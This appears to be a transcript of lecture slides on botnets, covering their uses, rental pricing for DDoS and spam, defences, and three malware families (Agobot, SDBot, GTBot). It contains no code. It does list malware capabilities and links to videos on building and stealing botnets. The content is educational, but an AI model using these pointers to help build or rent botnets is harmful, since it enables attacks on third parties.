botnets uses, prevention, and examples. background robot network programs communicating over a...
TRANSCRIPT
Background• Robot Network
• Programs communicating over a network to complete a task
• Adapted new meaning in the security world
• Network of compromised machines that can be remotely controlled
Numbers• Typically rented
• DDOS (10K – 120K (10-100 Gbps) for $200 per day)
• Spamming (SOCKS proxy)
• Web traffic Control (unique IP)
o Page/Ad viewso Likeso Poll Manipulation
Power• Cheap super computers (sold, rented, or kept for use)
• Bitcoin/Dogecoin mining
o BadLepricon distributed by Google Play
o GPU ‘idle’ at 180° F
o Storm Botnet (1mil – 50 mil machines), largest at time
Information• May as well
• Traffic sniffing, key loggers and other information theft
• Self propagation o Spreading over networko Detection of other botnets presenceo The enemy of my enemy is my competitor
o Happy Hacker, Zeu$ botnet master
For the Greater Good• What makes them bad can be used for good
o Hard to remove or disableo Good at hiding/quiet monitoringo Botnets with good intentions fighting
botnets
• Phalanx, DDOS protection
o Nodes of botnet used as protective mailboxes
o Pass on information when requestedo Computational puzzle to gain access
Defensive• Treat just like malware
• Intrusion Detection System
• Main target of botnets don’t follow these
o Keeping updatedo Quality firewall, anti-viruso Other general security measures
o Removal, maybe clean install
Offensive• Agencies know people think of security last
• Research for IDS
o Development of “good” botnetso Gun buying programs, better unused o Tracking down botnet masters
o Examining bought/captured botnetso Honeypots
Agobot - the multi-tool
• 500 know versions• Easy to use, little programming knowledge required• Simple to add commands / vulnerability scanners• Offers rootkit capabilities (process hiding)• If you want it there is a version that has it
• Advanced form of traffic sniffing
o Packet sniffers / key loggers o Self propagation o DDOS commands
o Stripped down lipcpap dll registered as system driver
o Utilizes libpcre dll to lookout for bot commands
SDBot – the cheaper multi-tool
• Written in very poor C but still widely used• Less sophisticated, smaller instruction set• Similar to Agobot in features
• Copies self to all mapped drives and shared network resources
• Can update itself which is cool • Bad form of traffic sniffing
o Processes hidingo Self replication
o Based on windows raw socket listining, listens to own traffic
Global Threat Bot - DDOS tool
• Distributed as a Trojan over Internet Relay Chat (IRC) networks
• Runs in stealth mode with the name mIRC Client
• Utilizes a number of mIRC bot scripts
• Once installed joins IRC channel and waits for commands
• Useful for launching DDOS attacks over IRC networks
Review• Botnets are malware with control (NO ZOMBIES)
• Numbers, Power, Information and maybe good uses
• Offensive and Defensive prevention
• 3 common examples
Links• http://www.wired.co.uk/news/archive/2013-05/16/internet-census• https://www.youtube.com/watch?v=2GdqoQJa6r4 - How to Steal a
Botnet• https://www.youtube.com/watch?v=A5-ewv3zvrM – How to Make
a Botnet• https://blog.damballa.com/archives/330 - DDOS pricing• The good stuff is just a search away, but be weary